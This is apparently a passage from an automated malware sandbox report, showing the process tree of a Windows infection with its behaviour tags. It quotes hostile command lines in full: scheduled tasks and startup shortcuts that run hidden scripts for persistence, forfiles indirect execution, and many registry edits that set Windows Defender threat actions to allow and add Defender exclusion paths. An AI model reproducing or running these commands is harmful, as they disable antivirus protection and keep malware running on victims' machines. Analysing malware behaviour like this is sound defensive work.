                                                            • Drops file in Windows directory
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2028
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 728
                                                            8⤵
                                                            • Program crash
                                                            PID:6604
                                                    • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2264
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 216
                                                        6⤵
                                                        • Program crash
                                                        PID:4380
                                                    • C:\Users\Admin\AppData\Local\Temp\1000279001\ovrflw.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000279001\ovrflw.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Adds Run key to start application
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1572
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
                                                        "C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:220
                                                    • C:\Users\Admin\AppData\Local\Temp\1000280001\wrsoc.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1000280001\wrsoc.exe"
                                                      5⤵
                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3184
                                                  • C:\Windows\SysWOW64\choice.exe
                                                    choice /d y /t 5
                                                    4⤵
                                                      PID:2756
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                                                  2⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1944
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:408
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\Admin\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
                                                  2⤵
                                                  • Drops startup file
                                                  • System Location Discovery: System Language Discovery
                                                  PID:656
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2684
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F
                                                    3⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4648
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit
                                                  2⤵
                                                  • Drops startup file
                                                  PID:2648
                                                • C:\Users\Admin\AppData\Local\Temp\1000280001\wrsoc.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1000280001\wrsoc.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Accesses Microsoft Outlook profiles
                                                  • outlook_office_path
                                                  • outlook_win_path
                                                  PID:5948
                                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                1⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:4628
                                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                1⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:5480
                                              • C:\Users\Admin\AppData\Local\Temp\7zS88A3.tmp\Install.exe
                                                C:\Users\Admin\AppData\Local\Temp\7zS88A3.tmp\Install.exe e1 /yvdidCNw 385107 /S
                                                1⤵
                                                • Executes dropped EXE
                                                • Drops desktop.ini file(s)
                                                • Drops file in System32 directory
                                                • Modifies data under HKEY_USERS
                                                PID:5216
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3808
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                    3⤵
                                                    • Indirect Command Execution
                                                    PID:5420
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5652
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:6712
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    3⤵
                                                    • Indirect Command Execution
                                                    PID:5500
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5900
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:4236
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                      3⤵
                                                      • Indirect Command Execution
                                                      PID:5172
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                        4⤵
                                                          PID:5864
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                            5⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5352
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                        3⤵
                                                        • Indirect Command Execution
                                                        PID:5888
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                          4⤵
                                                            PID:6672
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:6504
                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                            3⤵
                                                            • Indirect Command Execution
                                                            • System Location Discovery: System Language Discovery
                                                            PID:7736
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                              4⤵
                                                                PID:7796
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                  5⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Drops file in System32 directory
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:8012
                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                    6⤵
                                                                      PID:6524
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                              2⤵
                                                              • Drops file in System32 directory
                                                              • Modifies data under HKEY_USERS
                                                              PID:7108
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:5456
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:3840
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:6316
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:6516
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:6888
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:6936
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1824
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5484
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5564
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:4652
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:6220
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:5176
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:5684
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:5696
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:6152
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2192
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:5396
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:2108
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4692
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:6704
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:7244
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:7328
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:7520
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:7744
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:7824
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:7908
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:7996
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:8056
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:5956
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GWamqZVWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GWamqZVWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QEWXpPeaXUxnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QEWXpPeaXUxnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WfxNQjjWZmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WfxNQjjWZmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qCkphlJEjzXU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qCkphlJEjzXU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\usHRsfrcBQZgjTeIdMR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\waPdBDBOzCnVwFVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\waPdBDBOzCnVwFVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SzOsjPJAGPNEYYQWc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SzOsjPJAGPNEYYQWc\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kvKwEgGmKkXJvFrr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\kvKwEgGmKkXJvFrr\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:6440
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GWamqZVWU" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:7940
                                                                                                    • C:\Windows\SysWOW64\reg.exe
